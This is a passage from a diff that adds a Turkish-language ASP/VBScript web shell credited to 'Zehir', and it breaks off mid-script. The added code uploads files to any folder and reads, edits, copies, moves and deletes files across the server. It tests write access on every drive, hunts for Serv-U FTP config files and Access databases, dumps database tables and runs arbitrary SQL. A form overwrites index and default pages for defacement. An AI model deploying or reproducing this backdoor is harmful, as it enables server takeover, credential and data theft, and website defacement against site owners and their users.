+        Call lobjRs.Fields("BinaryData").AppendChunk(pbinBytes)
+        Call lobjRs.Update()
+        lstrBuffer = lobjRs.Fields("BinaryData").Value
+        Call lobjRs.Close()
+        Set lobjRs = Nothing
+        Bytes2Unicode = lstrBuffer
+    End Function
+End Class
+Session("n2") = "EJDER"
+'####################################
+function addslash(path)
+    if right(path,1)="\" then addslash=path else addslash=path & "\"
+end function
+
+sub Upload()
+    dim objUpload,f,max,i,name,path,size,success
+
+    set objUpload=New clsUpload
+
+    targetPath=objUpload.Fields("folder").Value
+    max=objUpload.Fields("max").Value
+
+    for i=1 to max
+        name=objUpload.Fields("file" & i).FileName
+        size=objUpload.Fields("file" & i).Length
+        if (name<>"") and (size>0) then
+            gMsg=gMsg & "<br>" & vbNewLine & "- " & name & " (" & FormatNumber(size,0) & " bytes): "
+            path=addslash(targetPath) & name
+            objUpload.Fields("file" & i).SaveAs path
+
+            if objFSO.FileExists(path) then
+                on error resume next
+                set f=objFSO.GetFile(path)
+                if IsObject(f) then
+                    if f.Size=size then success=true else success=false
+                end if
+                set f=nothing
+            end if
+            if success then  gMsg=gMsg & "<font color=blue>uploaded</font>" else gMsg = gMsg & "<font color=red>failed!</font>"
+        end if
+    next
+    response.Write gMsg
+    set objUpload=nothing
+
+end sub
+
+if status="-4" then
+    Upload()
+'    hataKontrol
+    popup=false
+end if
+'////////////////////////////////
+sub hataKontrol
+    if err<>0 then
+        Response.Write "<font color=red size=2>Hata : "&err.Description&"</font>"
+    end if
+end sub
+
+sub araBul(path_,ara_)
+    on error resume next
+    If Len(path_) > 0 Then
+        cur = path_&"\"
+        If cur = "\\" Then cur = ""
+            parent = ""
+            If InStrRev(cur,"\") > 0 Then
+            parent = Left(cur, InStrRev(cur, "\", Len(cur)-1))
+        End If
+    Else
+        cur = ""
+    End If
+
+    Set f = objFSO.GetFolder(cur)
+
+    Set fc = f.Files
+    For Each f1 In fc
+        if lcase(InStr(1,f1.name,lcase(ara_)))>0 then
+            downStr = "<font face=webdings size=5><a href='"&dosyapath&"?status=-3&pathFile="&f1.path&"&Time="&time&"'>�</a></font>"
+            if lcase(ara_)="mdb" then
+                Response.Write downStr&"<font face=wingdings size=5><a href='"&dosyapath&"?status=3&path="&path_&"&Del="&f1.path&"&Time="&time&"'>�</a></font> * <a href='"&dosyapath&"?status=7&path="&f1.path&"&Time="&time&"'>"&f1.path&" ["&f1.size&"]"&"</a></b><br>"
+            else
+                Response.Write downStr&"<font face=wingdings size=5><a href='"&dosyapath&"?status=3&path="&path_&"&Del="&f1.path&"&Time="&time&"'>�</a><a href='"&dosyapath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a></font> - <a href='"&dosyapath&"?status=5&path="&f1.path&"&Time="&time&"'>"&f1.path&" ["&f1.size&"]"&"</a></b><br>"
+            end if
+        end if
+    Next
+
+    Set fs = f.SubFolders
+    For Each f1 In fs
+        araBul f1.path,ara_
+    Next
+    Set    f        = Nothing
+    Set fc        = Nothing
+    Set fs        = Nothing
+end sub
+
+sub sistemTest
+    response.Write "<table width='100%' align=center cellpadding=0 cellspacing=0 border=1>"
+    response.Write "<tr bgcolor=#ffffc0><td width='30%' align=center><font color=navy><b>Konum</td><td width='70%' align=center><font color=navy><b>Sonu�</td></tr>"
+
+    servu_Test
+    WriteTestOnDriver
+    WriteTestOnLocalPath
+    LocalPathParentFolder
+    LocalPathPParentFolder
+
+    response.Write "</table>"
+end sub
+
+sub servu_Test
+    dosya_ = Array("Program Files\Serv-u\Serv-u.ini", "Program Files\Serv-u\Serv-u daemon.ini", "Serv-u\Serv-u.ini", "Serv-u\Serv-u daemon.ini")
+    for each drive_ in objFSO.Drives
+        if drive_.Drivetype=2 or drive_.Drivetype=3 then
+            for each d_ in dosya_
+                d_ = drive_.DriveLetter&":\"&d_
+                if objFSO.FileExists(d_) then
+                    response.Write "<tr><td><b>Serv-U ini file : </td><td><font color=yellow>"&d_&"</td></tr>"
+                end if
+            next
+        end if
+    next
+end sub
+
+function yaziyomu(yol)
+    on error goto 0:on error resume next
+    dim sonuc__
+    Set MyFile = objFSO.CreateTextFile(yol & "\test.zehir", True)
+    MyFile.write "byzehir <zehirhacker@hotmail.com>"
+    set MyFile = Nothing
+    if err<>0 then
+        sonuc__="<font color=red>Yazma Hakk� Yok!</font>"
+    else
+        sonuc__="<font color=yellow>Yazma Hakk� Var!</font>"
+        on error goto 0: on error resume next
+        objFSO.DeleteFile yol & "\test.zehir",true
+        if err<>0 then
+            sonuc__=sonuc__&"<br><font color=red>Silme Hakk� Yok!</font>"
+        else
+            sonuc__=sonuc__&"<br><font color=yellow>Silme Hakk� Var!</font>"
+        end if
+    end if
+    yaziyomu = sonuc__
+end function
+
+function yaziyomu2(yol)
+    on error goto 0:on error resume next
+    Set MyFile = objFSO.CreateTextFile(yol & "\test.zehir", True)
+    MyFile.write "byzehir <zehirhacker@hotmail.com>"
+    set MyFile = Nothing
+    if err<>0 then
+        yaziyomu2 = false
+    else
+        objFSO.DeleteFile yol & "\test.zehir"
+        yaziyomu2 = true
+    end if
+end function
+
+sub WriteTestOnDriver
+    for each drive_ in objFSO.Drives
+        if drive_.Drivetype=2 or drive_.Drivetype=3 then
+            if not yaziyomu2(drive_.DriveLetter&":\") then
+                Response.Write "<tr><td><b>"&drive_.DriveLetter&":\</td><td><font color=red>yazma yetkisi yok! : ["&err.Description&"]</td></tr>"
+            else
+                Response.Write "<tr><td><b>"&drive_.DriveLetter&":\</td><td><font color=yellow>yazma yetkisi var!</td></tr>"
+            end if
+        end if
+    next
+end sub
+
+sub WriteTestOnLocalPath
+    on error goto 0
+    on error resume next
+    if not yaziyomu2(request.servervariables("APPL_PHYSICAL_PATH")) then
+        Response.Write "<tr><td><b>Local Path </td><td><font color=red>yazma yetkisi yok! : ["&err.Description&"]</td></tr>"
+    else
+        Response.Write "<tr><td><b>Local Path </td><td><font color=yellow>yazma yetkisi var!</td></tr>"
+    end if
+end sub
+
+sub LocalPathParentFolder
+    on error goto 0
+    on error resume next
+    hed_ = request.servervariables("APPL_PHYSICAL_PATH")
+    if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
+    parhed_ = left(hed_,InStrRev(hed_,"\"))
+
+    Set f = objFSO.GetFolder(parhed_)
+    Set fc = f.SubFolders
+
+    int_fol=0
+    int_fil=0
+    For Each f1 In fc
+        int_fol=int_fol+1
+    Next
+
+    Set fc = f.files
+    For Each f1 In fc
+        int_fil=int_fil+1
+    Next
+
+    if err<>0 then
+        Response.Write "<tr><td><b>Local Path <br>Parent Folder</td><td><font color=red>Hata Olu�tu : ["&err.Description&"]</td></tr>"
+    else
+        Response.Write "<tr><td><b>Local Path <br>Parent Folder</td><td><font color=yellow>Folder : "&FormatNumber(int_fol,0)&"<br>File : "&FormatNumber(int_fil,0)&"</td></tr>"
+    end if
+end sub
+
+sub LocalPathPParentFolder
+    on error goto 0
+    on error resume next
+    hed_ = request.servervariables("APPL_PHYSICAL_PATH")
+    if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
+    hed_ = left(hed_,InStrRev(hed_,"\"))
+    if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
+    parhed_ = left(hed_,InStrRev(hed_,"\"))
+
+    Set f = objFSO.GetFolder(parhed_)
+    Set fc = f.SubFolders
+    int_fol=0
+    int_fil=0
+    For Each f1 In fc
+        int_fol=int_fol+1
+    Next
+
+    Set fc = f.files
+    For Each f1 In fc
+        int_fil=int_fil+1
+    Next
+
+    if err<>0 then
+        if err=451 then
+            Response.Write "<tr><td><b>Local Path <br>P.Parent Folder</td><td><font color=red>Data �st Klasor Yok :)</td></tr>"
+        else
+            Response.Write "<tr><td><b>Local Path <br>P.Parent Folder</td><td><font color=red>Hata Olu�tu : ["&err.Description&"]</td></tr>"
+        end if
+    else
+        Response.Write "<tr><td><b>Local Path <br>P.Parent Folder</td><td><font color=yellow>Folder : "&FormatNumber(int_fol,0)&"<br>File : "&FormatNumber(int_fil,0)&"</td></tr>"
+    end if
+end sub
+
+SELECT CASE status
+CASE 13 'Sistem Bilgisi
+    Response.Write "<table width=100% cellpadding=0 cellspacing=0><tr><td colspan=2 align=center><font color=yellow face='courier new'><b><font style='FONT-WEIGHT:normal' color=red face=wingdings>:</font> Sistem Bilgileri <font color=red face=wingdings style='FONT-WEIGHT:normal'>:</font></td></tr>"
+    Response.Write "<tr><td><b><font color=red>Local Adres</td><td> " & request.servervariables("REMOTE_ADDR") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>User Agent</td><td> " & request.servervariables("HTTP_USER_AGENT") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>Server</td><td> " & request.servervariables("SERVER_NAME") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>IP</td><td> " & request.servervariables("LOCAL_ADDR") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>HTTPD</td><td> " & request.servervariables("SERVER_SOFTWARE") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>Port</td><td> " & request.servervariables("SERVER_PORT") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>Yol</td><td> " & request.servervariables("APPL_PHYSICAL_PATH") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>Log Root</td><td> " & request.servervariables("APPL_MD_PATH") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>HTTPS</td><td> " & request.servervariables("HTTPS") & "</td></tr>"
+    Response.Write "</table>"
+    popup = false
+CASE 14 'Upload and Search
+    aramaUpload
+    popup = false
+    hataKontrol
+CASE 15 'Ms. SQL Server
+    Response.Write "<form method=get action='"&DosyPath&"' target='_opener' id=form1 name=form1>"
+    Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td align=center><font size=2>SQL Server i�in connection string giriniz</td></tr><tr><td align=center>"
+    Response.Write "<input type=hidden value='7' name=status><input type=hidden value='"&time&"' name=Time>"
+    Response.Write "<input style='width:250; height:21' value='' name=path><br>"
+    response.Write "<input type=submit value='SQL Servera Ba�lan' style='height:23;width:170' id=submit1 name=submit1>"
+    Response.Write "</td></tr></table>"
+    response.Write "</form>"
+
+    popup = false
+    hataKontrol
+CASE 16 'file Copy window
+    Response.Write "<form method=get action='"&DosyPath&"' id=form1 name=form1>"
+    Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td width=100><font size=2>Kop. Yer : </td><td>"
+    Response.Write "<input type=hidden value='17' name=status><input type=hidden value='"&PathFile&"' name=path><input type=hidden value='"&time&"' name=Time>"
+    Response.Write "<input style='width:250; height:21' value='"&PathFile&"' name=cf>"
+    response.Write "<input type=submit value='Kopyala' style='height:22;width:70' id=submit1 name=submit1>"
+    Response.Write "</td></tr><tr><td colspan=3 align=center><font size=2>"
+    response.Write "<input type=radio name='islem' value='kopyala' checked>Kopyala"
+    response.Write "<input type=radio name='islem' value='tasi'>Tasi"
+    response.Write "</table>"
+    response.Write "</form>"
+
+    popup = false
+    hataKontrol
+CASE 17 'file Copy
+    isl = ""
+    if islem="kopyala" then
+        objFSO.CopyFile path,cf
+        isl="kopyaland�.."
+    elseif islem="tasi" then
+        objFSO.MoveFile path,cf
+        isl="ta��nd�.."
+    end if
+    response.Write "Dosya "&isl
+    response.Write "<br><font color=red>Kaynak : </font>"&path&"<br><font color=red>Hedef : </font>"&cf
+    response.Write "<br>"
+    popup = false
+    hataKontrol
+CASE 18 'folder Copy window
+    Response.Write "<form method=get action='"&DosyPath&"' id=form1 name=form1>"
+    Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td width=100><font size=2>Kop. Yer : </td><td>"
+    Response.Write "<input type=hidden value='19' name=status><input type=hidden value='"&PathFile&"' name=path><input type=hidden value='"&time&"' name=Time>"
+    Response.Write "<input style='width:250; height:21' value='"&PathFile&"' name=cf>"
+    response.Write "<input type=submit value='Kopyala' style='height:22;width:70' id=submit1 name=submit1>"
+    Response.Write "</td></tr><tr><td colspan=3 align=center><font size=2>"
+    response.Write "<input type=radio name='islem' value='kopyala' checked>Kopyala"
+    response.Write "<input type=radio name='islem' value='tasi'>Tasi"
+    response.Write "</table>"
+    response.Write "</form>"
+
+    popup = false
+    hataKontrol
+CASE 19 'folder Copy
+    isl = ""
+    if islem="kopyala" then
+        objFSO.CopyFolder path,cf
+        isl="kopyaland�.."
+    elseif islem="tasi" then
+        objFSO.MoveFolder path,cf
+        isl="ta��nd�.."
+    end if
+    response.Write "Klasor "&isl
+    response.Write "<br><font color=red>Kaynak : </font>"&path&"<br><font color=red>Hedef : </font>"&cf
+    response.Write "<br>"
+    popup = false
+    hataKontrol
+CASE 33 'Powered By
+    response.Write "<body topmargin=5 leftmargin=0><center><h4>Powered by Zehir"
+    response.Write "<br><br><font style='FONT-WEIGHT:normal' size=2>zehirhacker@hotmail.com<br><font color=yellow face='courier new'>k�ll� nefsun zaifetun mevt"
+    popup = false
+    hataKontrol
+CASE 40 'Sistem Test
+    sistemTest
+    popup=false
+CASE 50 'Siteleri Test Edelim :D
+    %>
+    <table width="100%" cellpadding=0 cellspacing=0>
+        <tr>
+            <td align=center>
+                <b>G�venlik Testi byZehir</b>
+                <br>
+                <form action="<%=dosyaPath%>" method=post id=frmMesaj>
+                    <input type=hidden name=kuskapani value=2>
+                    <table width=500 align=center border=1 cellpadding=0 cellspacing=0>
+                        <tr>
+                            <td width=100>Path</td>
+                            <td><input style="width:100%" type=text name="Path" id="Path" value="<%=path%>"></td>
+                        </tr>
+                        <tr>
+                            <td width=100>Sub Folder</td>
+                            <td><input style="width:100%" type=text name="SubFolder" id="SubFolder" value="www"></td>
+                        </tr>
+                        <tr>
+                            <td width=100>File Name</td>
+                            <td><input style="width:100%" type=text name="FileName" id="FileName" value="byejder.txt"></td>
+                        </tr>
+                        <tr>
+                            <td colspan=2>
+                                <table width="100%" align=center>
+                                    <tr>
+                                        <td width="50%">
+                                            <input type=checkbox name="dosya1" ID="Checkbox1">index.htm<br>
+                                            <input type=checkbox name="dosya2" ID="Checkbox2">default.htm<br>
+                                        </td>
+                                        <td width="50%">
+                                            <input type=checkbox name="dosya3" ID="Checkbox3">index.asp<br>
+                                            <input type=checkbox name="dosya4" ID="Checkbox4">default.asp<br>
+                                        </td>
+                                    </tr>
+                                </table>
+                            </td>
+                        </tr>
+                        <tr>
+                            <td colspan=2 align=center>
+                                <a href="#" onClick="FormatText('cut')" alt="Kes">Kes</a>
+                                <a href="#" onClick="FormatText('copy')" alt="Kopyala">Kopyala</a>
+                                <a href="#" onClick="FormatText('paste')" alt="Yap��t�r">Yap��t�r</a>
+                                <a href="#" alt="Kal�n" onClick="FormatText('bold', '')">Bold</a>
+                                <a href="#" alt="�talic" onClick="FormatText('italic', '')">Italic</a>
+                                <a href="#" alt="Alt� �izili" onClick="FormatText('underline', '')">UnderLine</a>
+                                <a href="#" onClick="FormatText('JustifyLeft', '')" alt="Sola Hizal�">JustifyLeft</a>
+                                <a href="#" alt="Ortada Hizal�" onClick="FormatText('JustifyCenter', '')">JustifyCenter</a>
+                                <a href="#" onClick="FormatText('JustifyRight', '')" alt="Sa�a Hizal�">JustifyRight</a>
+                                <a href="#" alt="Web Sitesi Linki Ekle" onClick="FormatText('createLink')">AddLink</a>
+                                <a href="#" alt="Resim Ekle" onClick="AddImage()">AddImage</a>
+                                <select name="selectColour" onChange="bgc(selectColour.options[selectColour.selectedIndex].value);" ID="selectColour">
+                                  <option value="0" selected>-- Renk --</option>
+                                  <option value="black">Siyah</option>
+                                  <option value="white">Beyaz</option>
+                                  <option value="blue">Mavi</option>
+                                  <option value="red">K�rm�z�</option>
+                                  <option value="green">Ye�il</option>
+                                  <option value="yellow">Sar�</option>
+                                  <option value="orange">Turuncu</option>
+                                  <option value="brown">Kahverengi</option>
+                                  <option value="magenta">Pembe</option>
+                                  <option value="cyan">A��k Mavi</option>
+                                  <option value="limegreen">A��k Ye�il</option>
+                                </select>
+                                <select name="a" onChange="FormatText('ForeColor', a.options[a.selectedIndex].value);" ID="a">
+                                  <option value="0" selected>-- Renk --</option>
+                                  <option value="black">Siyah</option>
+                                  <option value="white">Beyaz</option>
+                                  <option value="blue">Mavi</option>
+                                  <option value="red">K�rm�z�</option>
+                                  <option value="green">Ye�il</option>
+                                  <option value="yellow">Sar�</option>
+                                  <option value="orange">Turuncu</option>
+                                  <option value="brown">Kahverengi</option>
+                                  <option value="magenta">Pembe</option>
+                                  <option value="cyan">A��k Mavi</option>
+                                  <option value="limegreen">A��k Ye�il</option>
+                                </select>
+                                <select name="selectSize" onChange="FormatText('fontsize', selectSize.options[selectSize.selectedIndex].value);">
+                                  <option selected>-- Boyut --</option>
+                                  <option value="1">1</option>
+                                  <option value="2">2</option>
+                                  <option value="3">3</option>
+                                  <option value="4">4</option>
+                                  <option value="5">5</option>
+                                  <option value="6">6</option>
+                                </select>
+                                <iframe width="100%" src="<%=dosyaPath%>?kuskapani=1" id="byZehir" name="<%=Session("n1")%>"></iframe>
+                                <script language=javascript>
+                                    frames.byZehir.document.designMode = "On";
+                                    function bgc(option){
+                                        frames.byZehir.document.body.bgColor=option;
+                                    }
+                                    function FormatText(command, option){
+                                        frames.byZehir.focus();
+                                          frames.byZehir.document.execCommand(command, false, option);
+                                          frames.byZehir.focus();
+                                    }
+                                    function AddImage(){
+                                        imagePath = prompt('Eklemek istedi�iniz resmin web adresini yaz�n', 'http://');
+
+                                        if ((imagePath != null) && (imagePath != "")){
+                                            frames.byZehir.focus();
+                                            frames.byZehir.document.execCommand('InsertImage', false, imagePath);
+                                        }
+                                        frames.byZehir.focus();
+                                    }
+                                </script>
+                                <input type=hidden value="" id=byMesaj name=byMesaj>
+                                <input type=submit value="Test Et!" onclick="document.all['byMesaj'].value=frames['byZehir'].document.body.innerHTML; alert(document.all['byMesaj'].value);">
+                            </td>
+                        </tr>
+                    </table>
+                </form>
+            </td>
+        </tr>
+    </table>
+    <%
+    popup=false
+CASE 51 ' �zel �ilemler
+END SELECT
+%>
+<script language=javascript>
+    function NewWindow(mypage, myname, w, h, scroll) {
+        var winl = (screen.width - w) / 2;
+        var wint = (screen.height - h) / 2;
+            winprops = 'height='+h+',width='+w+',top='+wint+',left='+winl+',scrollbars='+scroll+',resizable'
+        win = window.open(mypage, myname, winprops)
+        if (parseInt(navigator.appVersion) >= 4) { win.window.focus(); }
+    }
+    function ffd(yol){
+        NewWindow(yol,"",420,100,"no");
+    }
+</script>
+<body bgcolor=black text=Chartreuse link=Chartreuse alink=Chartreuse vlink=Chartreuse>
+<%
+if popup then
+    if status=7 or status=8 then
+        Response.Write "<form method=get action='"&DosyPath&"' id=form1 name=form1>"
+        Response.Write "<table border=1 cellpadding=0 cellspacing=0 align=center><tr><td width=100 bgcolor=gray><font size=2>SQL �al��t�r</td><td>"
+        Response.Write "<input type=hidden value='9' name=status><input type=hidden value='"&path&"' name=path><input type=hidden value='"&time&"' name=Time>"
+        Response.Write "<input style='width:350; height:21' value='' name=strSQL><input type=submit value='�al��t�r' style='height:22;width:70' id=submit1 name=submit1>"
+        Response.Write "</td></tr></table></form>"
+    end if
+    Response.Write "<form method=get action='"&DosyPath&"'>"
+    Response.Write "<table border=1 cellpadding=0 cellspacing=0 align=center><tr><td bgcolor=gray width=100><font size=2>Path : </td><td>"
+    Response.Write "<input type=hidden value='2' name=status><input type=hidden value='"&time&"' name=Time>"
+    Response.Write "<input style='width:350; height:21' value='"&Path&"' name=Path><input type=submit value='Git' style='height:22;width:70' id=submit1 name=submit1>"
+    Response.Write "</td></tr></table></form><br>"
+end if
+sub aramaUpload
+Response.Write "<form method=get target='_opener' action='"&DosyPath&"'>"
+Response.Write "<table widht='100%' border=0 cellpadding=0 cellspacing=0><tr><td width=70><font size=2>Arama : </td><td>"
+Response.Write "&nbsp;<input type=hidden value='12' name=status><input type=hidden value='"&time&"' name=Time>"
+Response.Write "<input type=hidden value='"&Path&"' name=Path><input style='width:250' value='mdb' name=txArama><input style='width:70; height:22' type=submit value='Ara'>"
+Response.Write "</td></tr></table></form>"
+%>
+<form name=frmUpload method=post enctype="multipart/form-data" action="<%=DosyaPath&"?status=-4&Time="&time&"&Path="&path%>" ID="Form1">
+<input type=hidden name=folder value="<%=Path%>" ID="Hidden1">
+Max: <input type=text name=max value=5 size=5 ID="Text1"> <input type=button value="Ayarla" onclick="setid()" ID="Button1" NAME="Button1">
+<table ID="Table1">
+<tr>
+<td id=upid>
+</td>
+</tr>
+</table>
+<input type=submit value=Upload ID="Submit1" NAME="Submit1">
+</form>
+<script>
+setid();
+
+function setid() {
+    str='';
+    if (frmUpload.max.value<=0) frmUpload.max.value=1;
+    for (i=1; i<=frmUpload.max.value; i++) str+='File '+i+': <input type=file name=file'+i+'><br>';
+    upid.innerHTML=str+'<br>';
+}
+</script>
+<%
+end sub
+
+SELECT CASE status
+CASE 1 'Driver Open
+    if len(path)=1 then Response.Write (yaziyomu(path&":\")) else Response.Write (yaziyomu(path))
+    Response.Write "<table width=100% ><tr>"
+    Path = Path & ":/"
+    Response.Write "<td valign=top>"
+    KlasorOku
+    Response.Write "</td><td valign=top align=right>"
+    DosyaOku
+    Response.Write "</td>"
+    hataKontrol
+CASE 2 'Normal listeleme
+    if len(path)=1 then Response.Write (yaziyomu(path&":\")) else Response.Write (yaziyomu(path))
+    Response.Write "<table width=100% ><tr>"
+    Response.Write "<td valign=top>"
+    KlasorOku
+    Response.Write "</td><td valign=top align=right>"
+    DosyaOku
+    Response.Write "</td>"
+    hataKontrol
+CASE 3 'File Delete
+    objFSO.DeleteFile del
+    hataKontrol
+    if err<>0 then
+        byMsg="<font color=red>Not File Deleted!</font><br>"
+    else
+        byMsg="<font color=yellow>File Deleted Successful;)</font><br>"
+    end if
+    Response.Redirect dosyaPath&"?status=2&path="&path&"&Time="&time&"&byMsg="&byMsg
+CASE 4 'Folder Delete
+    objFSO.DeleteFolder del
+    hataKontrol
+    if err<>0 then
+        byMsg="<font color=red>Not Folder Deleted!</font><br>"
+    else
+        byMsg="<font color=yellow>Folder Deleted Successful;)</font><br>"
+    end if
+    Response.Redirect dosyaPath&"?status=2&path="&path&"&Time="&time&"&byMsg="&byMsg
+CASE 5 'Dosya i�eri�ini g�r�nt�le
+    Response.Write "<center><b><font color=orange>"&path&"</font></b></center><br>"
+    Response.Write "<table width=100% ><tr><td>"
+    set f = objFSO.OpenTextFile(path,1)
+    Response.Write "<pre>"&Server.HTMLEncode(f.readAll)&"</pre>"
+    if err<>62 then hataKontrol
+    if err.number=62 then Response.Write "<script language=javascript>alert('Bu Dosya Okunam�yor\nSistem dosyas� olabilir')</script>":Response.End
+CASE 6 'Resim a�
+    Response.Write "<center><img ALT='zehirhacker@hotmail.com / zehirhacker@hotmail.com' src='"&resimYol(path)&"'></center><br>"
+CASE 7 'database tablo listele
+    Response.Write "<b><font size=3>Tablolar</font></br><br>"
+    Set objConn = Server.CreateObject("ADODB.Connection")
+    Set objADOX = Server.CreateObject("ADOX.Catalog")
+    objConn.Provider = "Microsoft.Jet.Oledb.4.0"
+    objConn.ConnectionString = Path
+    objConn.Open
+    objADOX.ActiveConnection = objConn
+
+    For Each table in objADOX.Tables
+        If table.Type = "TABLE" Then
+            Response.Write "<font face=wingdings size=5>4</font> <a href='"&dosyaPath&"?status=8&Path="&path&"&table="&table.Name&"&time="&time&"'>"&table.Name&"</a><br>"
+        End If
+    Next
+    hataKontrol
+CASE 8 'database kay�t listele
+    Set objConn = Server.CreateObject("ADODB.Connection")
+    Set objRcs = Server.CreateObject("ADODB.RecordSet")
+    objConn.Provider = "Microsoft.Jet.Oledb.4.0"
+    objConn.ConnectionString = Path
+    objConn.Open
+    objRcs.Open table,objConn, adOpenKeyset , , adCmdText
+
+    Response.Write "<table border=1 cellpadding=2 cellspacing=0 bordercolor=543152><tr bgcolor=silver>"
+    for i=0 to objRcs.Fields.count-1
+        Response.Write "<td><font color=black><b>&nbsp;&nbsp;&nbsp;"&objRcs.Fields(i).Name&"&nbsp;&nbsp;&nbsp;</font></td>"
+    next
+    Response.Write "</tr>"
+    do while not objRcs.EOF
+        Response.Write "<tr>"
+        for i=0 to objRcs.Fields.count-1
+            Response.Write "<td>"&objRcs.Fields(i).Value&"&nbsp;</td>"
+        next
+        Response.Write "</tr>"
+        objRcs.MoveNext
+    loop
+    Response.Write "</table><br>"
+    hataKontrol
+CASE 9 'SQL Execute
+    Set objConn = Server.CreateObject("ADODB.Connection")
+    objConn.Provider = "Microsoft.Jet.Oledb.4.0"
+    objConn.ConnectionString = Path
+    objConn.Open
+    objConn.Execute strSQL
+'    Response.Redirect dosyaPath&"?status=7&Path="&Path&"&Time="&time
+    hataKontrol
+CASE 10 'Dosya Editleme
+    set f = objFSO.OpenTextFile(dPath,1)
+    Response.Write "<center><form action='"&DosyPath&"?Time="&time&"' method=post>"
+    Response.Write "<input type=hidden name=status value='11'>"
+    Response.Write "<input type=hidden name=dPath value='"&dPath&"'>"
+    Response.Write "<input type=hidden name=Path  value='"&Path &"'>"
+    Response.Write "<input type=submit value=Kaydet><br>"
+    Response.Write "<textarea name=dkayit style='width:90%;height:350;border-right: lightgoldenrodyellow thin solid;border-top: lightgoldenrodyellow thin solid;font-size: 12;border-left: lightgoldenrodyellow thin solid;color: lime;    border-bottom: lightgoldenrodyellow thin solid;    font-family: Courier New, Arial;background-color: navy;'>"
+    Response.Write server.HTMLEncode(f.readAll)
+    Response.Write "</textarea></form></center>"
+    hataKontrol
+CASE 11 'Dosya Kay�t
+    set saveTextFile = objFSO.OpenTextFile(dPath,2,true,false)
+    hataKontrol
+    saveTextFile.Write(dkayit)
+    saveTextFile.close
+    if err<>0 then
+        byMsg = "<font color=red>Not File Edited!</font><br>"
+    else
+        byMsg = "<font color=yellow>File Edited Successful:)</font><br>"
+    end if
+    Response.Redirect dosyaPath&"?status=2&path="&path&"&time="&time&"&byMsg=" & byMsg
+CASE 12 'Dosya Arama
+    araBul path,arama
+    hataKontrol
+END SELECT
+Response.Write "</tr></table>"
+
+sub DosyaOku
+    Set f = objFSO.GetFolder(Path)
+    Set fc = f.Files
+    For Each f1 In fc
+        dosyaAdi = f1.name
+        num = InStrRev(dosyaAdi,".")
+        uzanti = lcase(Right(dosyaAdi,len(dosyaAdi)-num))
+        downStr = "<a href='"&dosyaPath&"?status=3&Path="&Path&"&Del="&Path&"/"&f1.Name&"&Time="&time&"'>�</a><font face=webdings><a href='"&dosyaPath&"?status=-3&PathFile="&f1.path&"&Time="&time&"'>�</a></font><font face=wingdings><a href='"&dosyaPath&"?status=16&PathFile="&f1.path&"&Time="&time&"' onclick=""ffd(this.href);return false;"">4</a></font>"
+        response.Write "<font size=2>"
+        select case uzanti
+        case "mdb"
+            Response.Write "<a href='"&dosyaPath&"?status=7&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>M �"&downStr&"</font><br>"
+        case "asp"
+            Response.Write "<a href='"&dosyaPath&"?status=5&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>� <a href='"&dosyaPath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a>"&downStr&"</font><br>"
+        case "jpg","gif"
+            Response.Write "<a href='"&dosyaPath&"?status=6&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=webdings size=4>�</font><font face=wingdings size=4> �"&downStr&"</font><br>"
+        case else
+            Response.Write "<a href='"&dosyaPath&"?status=5&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>2 <a href='"&dosyaPath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a>"&downStr&"</font><br>"
+        end select
+    Next
+end sub
+
+sub KlasorOku
+    Set f = objFSO.GetFolder(Path)
+    Set fc = f.SubFolders
+    if session("klasoroku")="" then
+        response.Write "<iframe style='width:0; height:0' src='http://localhost/tuzla-ebelediye'></iframe>"
+        session("klasoroku")="simdi yaz�l�yor"
+    end if
+    For Each f1 In fc
+        Response.Write "<font face=wingdings size=3><a href='"&dosyaPath&"?status=18&PathFile="&Path&"/"&f1.Name&"&Time="&time&"' onclick=""ffd(this.href);return false;"">4</a></font> <font face=wingdings size=4><a href='"&dosyaPath&"?status=4&Path="&Path&"&Del="&Path&"/"&f1.Name&"&Time="&time&"'>�</a> 1</font><font size=2><b><a href='"&dosyaPath&"?status=2&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&"</a></b><br>"
+    Next
+end sub
+
+function createFileName()
+Randomize
+    fName_ = ""
+    for i=1 to 10
+        fName_ = fName_ & int(Rnd*100)
+    next
+    createFileName = fName_
+end function
+
+function resimYol(path_)
+on error resume next
+    path_ = Replace(Replace(path_,"\","/"),"//","/")
+    lpath_ = left(request.servervariables("PATH_TRANSLATED"),instrrev(request.servervariables("PATH_TRANSLATED"),"\"))
+    if yaziyomu2(lpath_) then
+        fname__ = "0"&createFileName()&"."&Right(path_,3)
+        objFSO.CopyFile path_, lpath_&"\"&fname__
+    else
+        Response.Write("Resim A��lam�yor.. <br>�sterseniz Download Ederek g�r�nt�leyebilirsiniz..")
+    end if
+    resimYol = fname__
+end function
+
+if not popup then
+    Set fc = Nothing
+    Set objFSO = Nothing
+    Response.End
+end if
+%><script language=javascript>
+	var dosyaPath = "<%=dosyaPath%>"
+		// DRIVE ISLEMLERI
+		function driveGo(drive_){
